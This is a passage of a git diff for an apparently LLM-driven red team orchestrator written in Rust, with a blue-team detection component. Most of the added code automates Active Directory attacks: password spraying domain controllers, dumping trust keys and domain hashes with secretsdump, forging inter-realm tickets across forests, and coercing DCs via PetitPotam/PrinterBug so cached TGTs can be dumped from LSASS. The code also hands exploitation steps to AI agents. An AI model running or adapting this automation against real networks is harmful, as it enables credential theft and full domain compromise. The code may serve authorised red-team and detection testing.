discovered users --- + // Skip domains with pending delegation vulns — sprays lock delegation + // accounts and prevent S4U exploitation from succeeding. + if has_users && has_dcs { + let spray_work: Vec<(String, String)> = { + let state = dispatcher.state.read().await; + // Collect domains that have pending delegation vulns + let delegation_domains: std::collections::HashSet = state + .discovered_vulnerabilities + .values() + .filter(|v| { + let vt = v.vuln_type.to_lowercase(); + (vt == "constrained_delegation" || vt == "rbcd") + && !state.exploited_vulnerabilities.contains(&v.vuln_id) + }) + .filter_map(|v| { + v.details + .get("domain") + .or_else(|| v.details.get("Domain")) + .and_then(|d| d.as_str()) + .map(|d| d.to_lowercase()) + }) + .collect(); + state + .domain_controllers + .iter() + .filter(|(domain, _)| { + // Skip domains with pending delegation vulns + if delegation_domains.contains(&domain.to_lowercase()) { + return false; + } + // Use recovery_attempts in key so each round dispatches fresh sprays + let key = format!( + "stall_spray:{}:{}", + domain.to_lowercase(), + recovery_attempts + ); + !state.is_processed(DEDUP_PASSWORD_SPRAY, &key) + }) + .map(|(domain, dc_ip)| (domain.clone(), dc_ip.clone())) + .collect() + }; + + for (domain, dc_ip) in spray_work { + let payload = json!({ + "technique": "password_spray", + "target_ip": dc_ip, + "domain": domain, + "use_common_passwords": true, + }); + + match dispatcher + .throttled_submit("credential_access", "credential_access", payload, 7) + .await + { + Ok(Some(task_id)) => { + info!(task_id = %task_id, domain = %domain, "Stall recovery: password spray dispatched"); + let key = format!( + "stall_spray:{}:{}", + domain.to_lowercase(), + recovery_attempts + ); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_PASSWORD_SPRAY, key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_PASSWORD_SPRAY, &key) + .await; + } + Ok(None) => {} + Err(e) => warn!(err = %e, "Stall recovery: spray failed"), + } + } + } + + // --- Fallback 2: Low-hanging fruit (SYSVOL, GPP, LDAP descriptions, LAPS) --- + if has_creds && has_dcs { + let lhf_work: Vec<(String, String, String, ares_core::models::Credential)> = { + let state = dispatcher.state.read().await; + state + .credentials + .iter() + .filter(|c| !c.domain.is_empty() && !c.password.is_empty()) + .filter_map(|cred| { + let cred_domain = cred.domain.to_lowercase(); + let key = format!( + "stall_lhf:{}:{}:{}", + cred_domain, + cred.username.to_lowercase(), + recovery_attempts + ); + if state.is_processed(DEDUP_EXPANSION_CREDS, &key) { + return None; + } + let dc_ip = state + .domain_controllers + .get(&cred_domain) + .cloned() + .or_else(|| { + let suffix = format!(".{cred_domain}"); + state + .domain_controllers + .iter() + .find(|(d, _)| d.ends_with(&suffix)) + .map(|(_, ip)| ip.clone()) + })?; + Some((key, dc_ip, cred_domain, cred.clone())) + }) + .take(2) + .collect() + }; + + for (key, dc_ip, domain, cred) in lhf_work { + match dispatcher + .request_low_hanging_fruit(&dc_ip, &domain, &cred, 6) + .await + { + Ok(Some(task_id)) => { + info!(task_id = %task_id, domain = %domain, "Stall recovery: low-hanging fruit dispatched"); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_EXPANSION_CREDS, key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_EXPANSION_CREDS, &key) + .await; + } + Ok(None) => {} + Err(e) => warn!(err = %e, "Stall recovery: low-hanging fruit failed"), + } + } + } + } +} diff --git a/ares-cli/src/orchestrator/automation/trust.rs b/ares-cli/src/orchestrator/automation/trust.rs new file mode 100644 index 00000000..3ff3b80f --- /dev/null +++ b/ares-cli/src/orchestrator/automation/trust.rs @@ -0,0 +1,448 @@ +//! auto_trust_follow -- trust enumeration, key extraction, and cross-domain attacks. +//! +//! Three-phase automation: +//! +//! 1. **Trust enumeration**: When DA is achieved, dispatch `enumerate_domain_trusts` +//! to discover trust relationships via LDAP. +//! 2. **Trust key extraction**: When trusts are known and DA creds are available, +//! dispatch secretsdump for trust account hashes (e.g. `FABRIKAM$`). +//! 3. **Trust follow**: When a trust account hash is found, dispatch inter-realm +//! ticket creation and secretsdump against the foreign DC. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Monitors for trust account hashes and dispatches cross-domain attacks. +/// Interval: 30s. +pub async fn auto_trust_follow(dispatcher: Arc, mut shutdown: watch::Receiver) { + let mut interval = tokio::time::interval(Duration::from_secs(30)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + // Auto-enumerate trusts when DA is achieved + { + let state = dispatcher.state.read().await; + if state.has_domain_admin { + // Dispatch trust enumeration for each known DC (once per domain) + let enum_work: Vec<(String, String, String)> = state + .domain_controllers + .iter() + .filter(|(domain, _)| { + let key = format!("trust_enum:{}", domain.to_lowercase()); + !state.is_processed(DEDUP_TRUST_FOLLOW, &key) + }) + .map(|(domain, dc_ip)| { + let key = format!("trust_enum:{}", domain.to_lowercase()); + (key, domain.clone(), dc_ip.clone()) + }) + .collect(); + drop(state); + + for (key, domain, dc_ip) in enum_work { + // Find a credential for this domain + let cred = { + let s = dispatcher.state.read().await; + s.credentials + .iter() + .find(|c| { + !c.password.is_empty() + && (c.domain.to_lowercase() == domain.to_lowercase() + || domain + .to_lowercase() + .ends_with(&format!(".{}", c.domain.to_lowercase()))) + }) + .cloned() + }; + + if let Some(cred) = cred { + let payload = json!({ + "techniques": ["enumerate_domain_trusts"], + "target_ip": dc_ip, + "domain": domain, + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + + match dispatcher + .throttled_submit("recon", "recon", payload, 3) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + domain = %domain, + "Trust enumeration dispatched" + ); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_TRUST_FOLLOW, key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_TRUST_FOLLOW, &key) + .await; + } + Ok(None) => {} + Err(e) => warn!(err = %e, "Failed to dispatch trust enumeration"), + } + } + } + } + } + + // Extract trust keys for known cross-forest trusts + { + let state = dispatcher.state.read().await; + if state.has_domain_admin && !state.trusted_domains.is_empty() { + let extract_work: Vec<(String, String, String, String)> = state + .trusted_domains + .values() + .filter(|trust| trust.is_cross_forest()) + .filter_map(|trust| { + let key = format!("trust_extract:{}", trust.domain.to_lowercase()); + if state.is_processed(DEDUP_TRUST_FOLLOW, &key) { + return None; + } + // Find a DC in the source domain (our domain, not the trust target) + // The trust domain is the foreign one; we need to secretsdump our DC + let source_domain = state.domains.first()?; + let dc_ip = state + .domain_controllers + .get(&source_domain.to_lowercase()) + .cloned()?; + Some((key, trust.flat_name.clone(), trust.domain.clone(), dc_ip)) + }) + .collect(); + let admin_cred = state + .credentials + .iter() + .find(|c| c.is_admin && !c.password.is_empty()) + .cloned(); + drop(state); + + if let Some(cred) = admin_cred { + for (key, flat_name, trust_domain, dc_ip) in extract_work { + // secretsdump -just-dc-user FABRIKAM$ to get trust key + let trust_account = format!("{}$", flat_name.to_uppercase()); + let payload = json!({ + "technique": "secretsdump", + "target_ip": dc_ip, + "domain": cred.domain, + "just_dc_user": trust_account, + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + "reason": format!("extract trust key for {}", trust_domain), + }); + + match dispatcher + .throttled_submit("credential_access", "credential_access", payload, 2) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + trust_account = %trust_account, + trust_domain = %trust_domain, + "Trust key extraction dispatched" + ); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_TRUST_FOLLOW, key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_TRUST_FOLLOW, &key) + .await; + } + Ok(None) => {} + Err(e) => { + warn!(err = %e, "Failed to dispatch trust key extraction") + } + } + } + } + } + } + + // Follow trust keys (inter-realm ticket + foreign secretsdump) + let (work, admin_cred_phase3): ( + Vec, + Option, + ) = { + let state = dispatcher.state.read().await; + + // Skip if no domain admin yet — trust extraction requires DA-level creds + if !state.has_domain_admin { + continue; + } + + // Build lookup of known trust flat names → TrustInfo so we only + // process actual trust account hashes, not random machine accounts. + let trust_by_flat: std::collections::HashMap = + state + .trusted_domains + .values() + .map(|t| (t.flat_name.to_uppercase(), t)) + .collect(); + + let admin_cred = state + .credentials + .iter() + .find(|c| c.is_admin && !c.password.is_empty()) + .cloned(); + + let items = state + .hashes + .iter() + .filter_map(|hash| { + if !hash.username.ends_with('$') { + return None; + } + + // Only process hashes that match a known trust account + let netbios = hash.username.trim_end_matches('$').to_uppercase(); + let trust = trust_by_flat.get(&netbios)?; + + // Resolve source domain — fall back to first known domain + // when secretsdump output lacks domain prefix for machine accounts + let source_domain = if hash.domain.is_empty() { + state.domains.first().cloned().unwrap_or_default() + } else { + hash.domain.clone() + }; + if source_domain.is_empty() { + return None; + } + + let dedup_key = format!( + "trust_follow:{}:{}", + source_domain.to_lowercase(), + hash.username.to_lowercase() + ); + if state.is_processed(DEDUP_TRUST_FOLLOW, &dedup_key) { + return None; + } + + // Use the FQDN from the trust relationship — never fall back + // to bare NetBIOS name which produces invalid domain strings. + let target_domain = trust.domain.clone(); + + let target_dc_ip = state + .domain_controllers + .get(&target_domain.to_lowercase()) + .cloned(); + + let source_domain_sid = state + .domain_sids + .get(&source_domain.to_lowercase()) + .cloned(); + let target_domain_sid = state + .domain_sids + .get(&target_domain.to_lowercase()) + .cloned(); + + let source_dc_ip = state + .domain_controllers + .get(&source_domain.to_lowercase()) + .cloned(); + + Some(TrustFollowWork { + dedup_key, + hash: hash.clone(), + source_domain, + target_domain, + target_dc_ip, + source_domain_sid, + target_domain_sid, + source_dc_ip, + }) + }) + .collect(); + + (items, admin_cred) + }; + + for item in work { + let vuln_id = format!( + "forest_trust_{}_{}", + item.source_domain.to_lowercase(), + item.target_domain.to_lowercase() + ); + let trust_target = item + .target_dc_ip + .clone() + .unwrap_or_else(|| item.target_domain.clone()); + { + let mut details = std::collections::HashMap::new(); + details.insert( + "source_domain".into(), + serde_json::Value::String(item.source_domain.clone()), + ); + details.insert( + "target_domain".into(), + serde_json::Value::String(item.target_domain.clone()), + ); + details.insert( + "trust_account".into(), + serde_json::Value::String(item.hash.username.clone()), + ); + details.insert( + "note".into(), + serde_json::Value::String(format!( + "Forest trust escalation via {} trust key — inter-realm ticket + secretsdump", + item.hash.username + )), + ); + let vuln = ares_core::models::VulnerabilityInfo { + vuln_id: vuln_id.clone(), + vuln_type: "forest_trust_escalation".to_string(), + target: trust_target, + discovered_by: "trust_automation".to_string(), + discovered_at: chrono::Utc::now(), + details, + recommended_agent: String::new(), + priority: 1, + }; + let _ = dispatcher + .state + .publish_vulnerability(&dispatcher.queue, vuln) + .await; + } + + // 1. Dispatch inter-realm ticket creation. + // Use field names that match the tool and prompt expectations: + // - `vuln_type` routes to generate_trust_key_prompt + // - `source_sid`/`target_sid` match create_inter_realm_ticket tool + // - `trusted_domain` is read by the trust prompt + // - Include admin creds + dc_ip so the LLM can call get_sid if SIDs are missing + let mut ticket_payload = json!({ + "technique": "create_inter_realm_ticket", + "vuln_type": "cross_forest", + "domain": item.source_domain, + "trusted_domain": item.target_domain, + "target_domain": item.target_domain, + "target": item.target_dc_ip.as_deref().unwrap_or(&item.target_domain), + "trust_key": item.hash.hash_value, + "trust_account": item.hash.username, + "vuln_id": &vuln_id, + }); + if let Some(ref sid) = item.source_domain_sid { + ticket_payload["source_sid"] = json!(sid); + } + if let Some(ref sid) = item.target_domain_sid { + ticket_payload["target_sid"] = json!(sid); + } + if let Some(ref aes) = item.hash.aes_key { + ticket_payload["aes_key"] = json!(aes); + } + if let Some(ref dc_ip) = item.source_dc_ip { + ticket_payload["dc_ip"] = json!(dc_ip); + } + if let Some(ref cred) = admin_cred_phase3 { + ticket_payload["username"] = json!(cred.username); + ticket_payload["password"] = json!(cred.password); + } + + match dispatcher + .throttled_submit("exploit", "privesc", ticket_payload, 1) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + trust_account = %item.hash.username, + source_domain = %item.source_domain, + target_domain = %item.target_domain, + has_source_sid = item.source_domain_sid.is_some(), + has_target_sid = item.target_domain_sid.is_some(), + "Inter-realm ticket task dispatched" + ); + let _ = dispatcher + .state + .mark_exploited(&dispatcher.queue, &vuln_id) + .await; + } + Ok(None) => { + debug!("Inter-realm ticket deferred by throttler"); + continue; + } + Err(e) => { + warn!(err = %e, "Failed to dispatch inter-realm ticket"); + continue; + } + } + + // 2. If we know the target DC, dispatch secretsdump against it + if let Some(ref dc_ip) = item.target_dc_ip { + let sd_payload = json!({ + "technique": "secretsdump", + "target_ip": dc_ip, + "domain": item.target_domain, + "trust_account": item.hash.username, + "trust_key": item.hash.hash_value, + }); + + match dispatcher + .throttled_submit("credential_access", "credential_access", sd_payload, 2) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + target_dc = %dc_ip, + target_domain = %item.target_domain, + "Cross-domain secretsdump dispatched" + ); + } + Ok(None) => {} + Err(e) => warn!(err = %e, "Failed to dispatch cross-domain secretsdump"), + } + } + + // Mark as processed + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_TRUST_FOLLOW, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_TRUST_FOLLOW, &item.dedup_key) + .await; + } + } +} + +struct TrustFollowWork { + dedup_key: String, + hash: ares_core::models::Hash, + source_domain: String, + target_domain: String, + target_dc_ip: Option, + source_domain_sid: Option, + target_domain_sid: Option, + source_dc_ip: Option, +} diff --git a/ares-cli/src/orchestrator/automation/unconstrained.rs b/ares-cli/src/orchestrator/automation/unconstrained.rs new file mode 100644 index 00000000..baa6845d --- /dev/null +++ b/ares-cli/src/orchestrator/automation/unconstrained.rs @@ -0,0 +1,385 @@ +//! auto_unconstrained_exploitation -- coerce-and-dump for unconstrained delegation. +//! +//! When a machine account with unconstrained delegation is discovered (e.g. +//! `DC02$`), this automation orchestrates the full attack chain: +//! +//! 1. **Coerce** a DC to authenticate to the unconstrained delegation host +//! (PetitPotam / PrinterBug). The DC's TGT is cached in LSASS on that host. +//! 2. **Dump** cached TGTs from the host's LSASS memory via lsassy. +//! 3. **Chain** — result_processing's `auto_chain_s4u_secretsdump` picks up any +//! `.ccache` ticket and dispatches secretsdump automatically. +//! +//! User accounts with unconstrained delegation (e.g. `sarah.connor`) are left to +//! the LLM-driven exploit path since we can't determine the target host. + +use std::collections::HashMap; +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tokio::time::Instant; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::DEDUP_COERCED_DCS; + +/// Delay after coercion before dispatching the first TGT dump, giving the +/// coerced authentication time to complete and the TGT to land in LSASS. +const COERCE_TO_DUMP_DELAY: Duration = Duration::from_secs(15); + +/// Maximum TGT dump attempts per vulnerability before giving up. +const MAX_DUMP_ATTEMPTS: u32 = 3; + +/// Delay between successive dump retries for the same vuln. +const DUMP_RETRY_DELAY: Duration = Duration::from_secs(60); + +// ----------------------------------------------------------------------- +// Phase tracking (in-memory only — intentionally not persisted so restarts +// re-trigger the chain, since cached TGTs expire quickly). +// ----------------------------------------------------------------------- + +#[derive(Debug)] +struct PhaseState { + coercion_dispatched_at: Option, + dump_attempts: u32, + last_dump_at: Option, + completed: bool, +} + +/// Monitors for unconstrained delegation vulns and orchestrates coerce → dump. +/// Interval: 20s. Wakes on delegation_notify and credential_access_notify. +pub async fn auto_unconstrained_exploitation( + dispatcher: Arc, + mut shutdown: watch::Receiver, +) { + let deleg_notify = dispatcher.delegation_notify.clone(); + let cred_notify = dispatcher.credential_access_notify.clone(); + let mut interval = tokio::time::interval(Duration::from_secs(20)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + let mut phases: HashMap = HashMap::new(); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = deleg_notify.notified() => {}, + _ = cred_notify.notified() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + let work: Vec = { + let state = dispatcher.state.read().await; + + if state.has_domain_admin { + continue; + } + + state + .discovered_vulnerabilities + .values() + .filter_map(|vuln| { + if vuln.vuln_type.to_lowercase() != "unconstrained_delegation" { + return None; + } + if state.exploited_vulnerabilities.contains(&vuln.vuln_id) { + return None; + } + + let account_name = vuln + .details + .get("account_name") + .and_then(|v| v.as_str())? + .to_string(); + + let domain = vuln + .details + .get("domain") + .and_then(|v| v.as_str()) + .unwrap_or("") + .to_string(); + + // Skip completed vulns + if phases.get(&vuln.vuln_id).is_some_and(|p| p.completed) { + return None; + } + + // Only automate machine accounts — we can resolve hostname → IP. + // User accounts (sarah.connor) go through the LLM exploit path. + if !account_name.ends_with('$') { + return None; + } + + // Resolve machine hostname → IP from discovered hosts. + // DC02$ → look for host with hostname starting with "dc02". + let hostname_prefix = account_name.trim_end_matches('$').to_lowercase(); + let host_ip = state.hosts.iter().find_map(|h| { + let h_lower = h.hostname.to_lowercase(); + if h_lower == hostname_prefix + || h_lower.starts_with(&format!("{hostname_prefix}.")) + { + Some(h.ip.clone()) + } else { + None + } + })?; + + // Find a DC in the same domain — this is what we coerce FROM. + let dc_ip = state + .domain_controllers + .get(&domain.to_lowercase()) + .cloned(); + + // Find any non-quarantined credential for this domain. + let credential = state + .credentials + .iter() + .find(|c| { + c.domain.to_lowercase() == domain.to_lowercase() + && !state.is_credential_quarantined(&c.username, &c.domain) + }) + .cloned(); + + if credential.is_none() { + debug!( + vuln_id = %vuln.vuln_id, + "Unconstrained: no credential available yet" + ); + return None; + } + + // Determine action based on current phase. + let phase = phases.get(&vuln.vuln_id); + + // If auto_coercion already coerced this DC, skip straight to dump. + let already_coerced = dc_ip + .as_ref() + .is_some_and(|ip| state.is_processed(DEDUP_COERCED_DCS, ip)); + + let action = match phase { + // No phase yet — dispatch coercion (or skip if already coerced). + None if already_coerced => Action::Dump, + None if dc_ip.is_some() => Action::Coerce, + None => { + debug!( + vuln_id = %vuln.vuln_id, + "Unconstrained: no DC found for coercion" + ); + return None; + } + + // Coercion dispatched, waiting for delay before dump. + Some(p) + if p.coercion_dispatched_at.is_some() + && p.dump_attempts == 0 + && p.coercion_dispatched_at.unwrap().elapsed() + >= COERCE_TO_DUMP_DELAY => + { + Action::Dump + } + + // Dump retry — previous attempt didn't yield TGTs. + Some(p) + if p.dump_attempts > 0 + && p.dump_attempts < MAX_DUMP_ATTEMPTS + && p.last_dump_at + .is_none_or(|t| t.elapsed() >= DUMP_RETRY_DELAY) => + { + Action::Dump + } + + _ => return None, + }; + + Some(UnconstrainedWork { + vuln_id: vuln.vuln_id.clone(), + account_name, + domain, + host_ip, + dc_ip, + credential, + action, + }) + }) + .collect() + }; + + for item in work { + match item.action { + Action::Coerce => { + let dc_ip = match &item.dc_ip { + Some(ip) => ip.clone(), + None => continue, + }; + + let cred = match &item.credential { + Some(c) => c, + None => continue, + }; + + // Coerce DC → unconstrained host. The DC's TGT is cached + // in the unconstrained host's LSASS. + let payload = json!({ + "target_ip": dc_ip, + "listener_ip": item.host_ip, + "techniques": ["petitpotam", "printerbug"], + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + "reason": "unconstrained_delegation_coercion", + }); + + match dispatcher + .throttled_submit("coercion", "coercion", payload, 8) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + vuln_id = %item.vuln_id, + account = %item.account_name, + dc = %dc_ip, + listener = %item.host_ip, + "Unconstrained delegation: coercion dispatched (DC → host)" + ); + phases.insert( + item.vuln_id.clone(), + PhaseState { + coercion_dispatched_at: Some(Instant::now()), + dump_attempts: 0, + last_dump_at: None, + completed: false, + }, + ); + } + Ok(None) => { + debug!(vuln_id = %item.vuln_id, "Coercion deferred by throttler"); + } + Err(e) => { + warn!( + err = %e, + vuln_id = %item.vuln_id, + "Failed to dispatch unconstrained coercion" + ); + } + } + } + + Action::Dump => { + let cred = match &item.credential { + Some(c) => c, + None => continue, + }; + + let payload = json!({ + "technique": "unconstrained_tgt_dump", + "vuln_type": "unconstrained_delegation", + "vuln_id": item.vuln_id, + "target": item.host_ip, + "target_ip": item.host_ip, + "domain": item.domain, + "account_name": item.account_name, + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + + match dispatcher + .throttled_submit("exploit", "privesc", payload, 9) + .await + { + Ok(Some(task_id)) => { + let phase = phases.entry(item.vuln_id.clone()).or_insert(PhaseState { + coercion_dispatched_at: None, + dump_attempts: 0, + last_dump_at: None, + completed: false, + }); + phase.dump_attempts += 1; + phase.last_dump_at = Some(Instant::now()); + + info!( + task_id = %task_id, + vuln_id = %item.vuln_id, + attempt = phase.dump_attempts, + target = %item.host_ip, + "Unconstrained delegation: TGT dump dispatched" + ); + + if phase.dump_attempts >= MAX_DUMP_ATTEMPTS { + phase.completed = true; + debug!( + vuln_id = %item.vuln_id, + "Unconstrained delegation: max dump attempts reached" + ); + } + } + Ok(None) => { + debug!(vuln_id = %item.vuln_id, "TGT dump deferred by throttler"); + } + Err(e) => { + warn!( + err = %e, + vuln_id = %item.vuln_id, + "Failed to dispatch TGT dump" + ); + } + } + } + } + } + } +} + +#[derive(Debug)] +enum Action { + Coerce, + Dump, +} + +struct UnconstrainedWork { + vuln_id: String, + account_name: String, + domain: String, + host_ip: String, + dc_ip: Option, + credential: Option, + action: Action, +} + +#[cfg(test)] +mod tests { + #[test] + fn test_hostname_resolution_machine_account() { + // DC02$ → "dc02" + let account = "DC02$"; + let prefix = account.trim_end_matches('$').to_lowercase(); + assert_eq!(prefix, "dc02"); + + // Should match "dc02.child.contoso.local" + let hostname = "dc02.child.contoso.local"; + let h_lower = hostname.to_lowercase(); + assert!(h_lower == prefix || h_lower.starts_with(&format!("{prefix}."))); + } + + #[test] + fn test_hostname_resolution_short_name() { + let account = "DC01$"; + let prefix = account.trim_end_matches('$').to_lowercase(); + assert_eq!(prefix, "dc01"); + + // Should match "dc01" + assert!("dc01" == prefix); + // Should match "dc01.contoso.local" + assert!("dc01.contoso.local".starts_with(&format!("{prefix}."))); + // Should NOT match "dc011.contoso.local" + assert!(!"dc011.contoso.local".starts_with(&format!("{prefix}."))); + } +} diff --git a/ares-cli/src/orchestrator/automation_spawner.rs b/ares-cli/src/orchestrator/automation_spawner.rs new file mode 100644 index 00000000..c02590eb --- /dev/null +++ b/ares-cli/src/orchestrator/automation_spawner.rs @@ -0,0 +1,47 @@ +use std::sync::Arc; + +use tokio::sync::watch; +use tracing::info; + +use crate::orchestrator::automation; +use crate::orchestrator::dispatcher::Dispatcher; + +/// Spawn all automation background tasks. Returns their JoinHandles. +pub(crate) fn spawn_automation_tasks( + dispatcher: Arc, + shutdown_rx: watch::Receiver, +) -> Vec> { + let mut handles = Vec::new(); + + macro_rules! spawn_auto { + ($name:ident) => {{ + let d = dispatcher.clone(); + let s = shutdown_rx.clone(); + handles.push(tokio::spawn(async move { + automation::$name(d, s).await; + })); + }}; + } + + spawn_auto!(auto_crack_dispatch); + spawn_auto!(auto_mssql_detection); + spawn_auto!(auto_adcs_enumeration); + spawn_auto!(auto_share_enumeration); + spawn_auto!(auto_share_spider); + spawn_auto!(auto_bloodhound); + spawn_auto!(auto_delegation_enumeration); + spawn_auto!(auto_coercion); + spawn_auto!(auto_local_admin_secretsdump); + spawn_auto!(auto_credential_access); + spawn_auto!(auto_credential_expansion); + spawn_auto!(auto_golden_ticket); + spawn_auto!(auto_acl_chain_follow); + spawn_auto!(auto_trust_follow); + spawn_auto!(auto_s4u_exploitation); + spawn_auto!(auto_gmsa_extraction); + spawn_auto!(auto_unconstrained_exploitation); + spawn_auto!(auto_stall_detection); + + info!(count = handles.len(), "Automation tasks spawned"); + handles +} diff --git a/ares-cli/src/orchestrator/blue/auto_submit.rs b/ares-cli/src/orchestrator/blue/auto_submit.rs new file mode 100644 index 00000000..cf64061d --- /dev/null +++ b/ares-cli/src/orchestrator/blue/auto_submit.rs @@ -0,0 +1,246 @@ +//! Auto-submit blue team investigations from red team operation state. +//! +//! When `ARES_BLUE_ENABLED=1`, this background task watches for red team +//! findings and automatically submits investigation requests to the +//! `ares:blue:investigations` queue. Without this, the blue orchestrator +//! polls an empty queue forever — investigation requests must be pushed +//! explicitly (via CLI) or auto-submitted (this module). + +use std::sync::Arc; +use std::time::Duration; + +use anyhow::Result; +use chrono::Utc; +use redis::AsyncCommands; +use tokio::sync::watch; +use tracing::{info, warn}; + +use crate::orchestrator::config::OrchestratorConfig; +use crate::orchestrator::state::SharedState; +use crate::orchestrator::task_queue::TaskQueue; + +/// Minimum red team activity before submitting a blue investigation. +const MIN_CREDENTIALS: usize = 1; +const MIN_HOSTS: usize = 2; + +/// How long to wait after orchestrator start before first check. +const INITIAL_DELAY_SECS: u64 = 90; + +/// How often to check if a new investigation should be submitted. +const CHECK_INTERVAL_SECS: u64 = 30; + +/// Collect env vars that blue tools need (Grafana, Loki, etc.). +fn collect_blue_env_vars() -> std::collections::HashMap { + const NAMES: &[&str] = &[ + "OPENAI_API_KEY", + "ANTHROPIC_API_KEY", + "GRAFANA_SERVICE_ACCOUNT_TOKEN", + "GRAFANA_URL", + "LOKI_URL", + "LOKI_AUTH_TOKEN", + "PROMETHEUS_URL", + ]; + let mut map = std::collections::HashMap::new(); + for name in NAMES { + if let Ok(val) = std::env::var(name) { + if !val.is_empty() { + map.insert(name.to_string(), val); + } + } + } + map +} + +/// Spawn the blue auto-submit task as a background tokio task. +pub fn spawn_blue_auto_submit( + queue: TaskQueue, + shared_state: SharedState, + config: Arc, + model_spec: String, + shutdown_rx: watch::Receiver, +) -> tokio::task::JoinHandle<()> { + tokio::spawn(async move { + if let Err(e) = auto_submit_loop(queue, shared_state, config, model_spec, shutdown_rx).await + { + warn!("Blue auto-submit exited with error: {e}"); + } + }) +} + +async fn auto_submit_loop( + queue: TaskQueue, + shared_state: SharedState, + config: Arc, + model_spec: String, + mut shutdown_rx: watch::Receiver, +) -> Result<()> { + info!("Blue auto-submit: waiting {INITIAL_DELAY_SECS}s for red team activity"); + + // Wait for initial red team activity + tokio::select! { + _ = tokio::time::sleep(Duration::from_secs(INITIAL_DELAY_SECS)) => {} + _ = shutdown_rx.changed() => return Ok(()), + } + + let mut submitted = false; + + loop { + if *shutdown_rx.borrow() { + break; + } + + if !submitted { + let state = shared_state.read().await; + let cred_count = state.credentials.len(); + let host_count = state.hosts.len(); + let vuln_count = state.discovered_vulnerabilities.len(); + let has_enough = cred_count >= MIN_CREDENTIALS || host_count >= MIN_HOSTS; + drop(state); + + if has_enough { + info!( + credentials = cred_count, + hosts = host_count, + vulns = vuln_count, + "Blue auto-submit: red team has enough findings, submitting investigation" + ); + + match submit_investigation(&queue, &shared_state, &config, &model_spec).await { + Ok(inv_id) => { + info!( + investigation_id = %inv_id, + operation_id = %config.operation_id, + "Blue auto-submit: investigation queued" + ); + submitted = true; + } + Err(e) => { + warn!("Blue auto-submit: failed to submit investigation: {e}"); + } + } + } + } + + if submitted { + // Done — exit the loop + break; + } + + tokio::select! { + _ = tokio::time::sleep(Duration::from_secs(CHECK_INTERVAL_SECS)) => {} + _ = shutdown_rx.changed() => break, + } + } + + info!("Blue auto-submit task finished"); + Ok(()) +} + +/// Build and submit a blue investigation request from the current red team state. +async fn submit_investigation( + queue: &TaskQueue, + shared_state: &SharedState, + config: &OrchestratorConfig, + model_spec: &str, +) -> Result { + let state = shared_state.read().await; + let now = Utc::now(); + + let op_id = &config.operation_id; + let inv_id = format!("inv-{}", now.format("%Y%m%d-%H%M%S")); + + // Collect target data from state + let target_ips: Vec = state.hosts.iter().map(|h| h.ip.clone()).collect(); + let target_users: Vec = state + .credentials + .iter() + .map(|c| c.username.clone()) + .collect(); + let cred_count = state.credentials.len(); + let host_count = state.hosts.len(); + let vuln_count = state.discovered_vulnerabilities.len(); + let domains: Vec = state.domains.clone(); + + // Collect MITRE techniques from timeline if available + let techniques: Vec = Vec::new(); // Timeline techniques would need Redis lookup + + drop(state); + + let grafana_url = std::env::var("GRAFANA_URL").ok(); + let grafana_token = std::env::var("GRAFANA_SERVICE_ACCOUNT_TOKEN").ok(); + + // Build synthetic alert (mirrors ares-cli blue from-operation) + let operation_context = serde_json::json!({ + "operation_id": op_id, + "attack_window_start": now.to_rfc3339(), + "attack_window_end": now.to_rfc3339(), + "techniques_used": techniques, + "domains": domains, + }); + + let alert = serde_json::json!({ + "labels": { + "alertname": format!("RedTeamOperation_{op_id}"), + "severity": "critical", + "source": "ares-red-team", + }, + "annotations": { + "summary": format!( + "Red team operation {op_id} - {cred_count} credentials, {host_count} hosts, {vuln_count} vulnerabilities", + ), + "description": format!( + "Investigate blue team detection coverage for red team operation {op_id}. \ + Operation is in progress.", + ), + }, + "operation_context": operation_context, + "startsAt": now.to_rfc3339(), + "target_ips": &target_ips[..std::cmp::min(target_ips.len(), 50)], + "target_users": &target_users[..std::cmp::min(target_users.len(), 50)], + }); + + // Strip provider prefix for the model name (blue runner does this too) + let model = model_spec + .split_once('/') + .map(|(_, name)| name) + .unwrap_or(model_spec); + + let request = serde_json::json!({ + "investigation_id": inv_id, + "alert": alert, + "correlation_context": null, + "model": model, + "max_steps": 75, + "multi_agent": true, + "auto_route": false, + "report_dir": null, + "operation_id": op_id, + "grafana_url": grafana_url, + "grafana_api_key": grafana_token, + "submitted_at": now.to_rfc3339(), + }); + + let mut conn = queue.connection(); + + // Store env vars for the investigation (blue tools read these from Redis) + let env_vars = collect_blue_env_vars(); + if !env_vars.is_empty() { + let env_key = 